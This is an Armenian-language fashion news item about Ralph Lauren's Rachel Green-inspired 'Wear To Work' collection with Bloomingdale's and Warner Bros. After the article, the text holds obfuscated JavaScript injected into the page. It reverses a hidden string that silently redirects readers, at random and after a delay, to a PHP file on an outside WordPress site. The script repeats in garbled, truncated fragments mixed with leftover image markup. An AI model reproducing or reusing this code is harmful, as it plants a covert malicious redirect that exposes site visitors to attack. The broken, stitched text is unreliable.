Ռալֆ Լորենը թողարկում է Ռեյչել Գրինին նվիրված հավաքածու

25 տարի առաջ «Ընկերներ» ամերիկյան հեռուստասերիալն առաջին անգամ հայտնվեց  էկրաններին, այսինքն՝ արդեն 25 տարի է, ինչ մենք առաջին անգամ ծանոթացանք Ռեյչել Գրինի հագուստների ոճին: Եվ, ինչպես բոլոր երկրպագուներին է հայտնի, 10 տարվա աշխատանքի ընթացքում դերասանուհին իր կերպարները ներկայացնելու համար համագործակցել է Բլումինգդեյլսի (Bloomingdales-ի) և Ռալֆ Լորեն կորպորացիայի հետ: Այժմ այս երկու ապրանքանիշները, համախմբվելով ԱՄՆ-ի խոշոր կինոարտադրողներից Ուորներ Բրոսի (Warner Bros-ի) հետ, ստեղծել են նոր հավաքածու՝ նվիրված Գրինի աշխատանքային զգեստապահարանին:

Ռալֆ Լորենը պատրաստել է Wear To Work հավաքածուն ՝ հիմնված Ռեյչել Գրինի կերպարի ոճի վրա: Այն բաղկացած է Գրինի 90-ականների տարբեր հանդերձանքներից, որոնք 2019-ի համար թարմացվել են համապատասխան մոտիվներով: Հագուստներն ինչպես Polo Ralph Lauren, այնպես էլ Lauren Ralph Lauren շարքից են, ինչը նշանակում է, որ շատ հագուստներ կլինեն ավելի մատչելի, քան կարող էիք ակնկալել` սկսած £120-ից:

Հավաքածուն կցուցադրվի Բլումինգդեյլսում, որտեղ Ռեյչել Գրինը ստացել էր նորաձևության ոլորտում առաջին լուրջ աշխատանքը: Եթե Նյու Յորքում չեք, հոգ չէ, քանի որ այսօրվանից կարող եք ձեռք բերել հավաքածուից ձեր հավանած իրերն առցանց, ինչպես նաև Ռալֆ Լորեն խանութներում:

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton-and-eddie-cahill-act-in-a-scene-from-news-photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-1568796399.jpg” alt=”” width=”528″ height=”440″ />

Աղբյուր՝ elle.com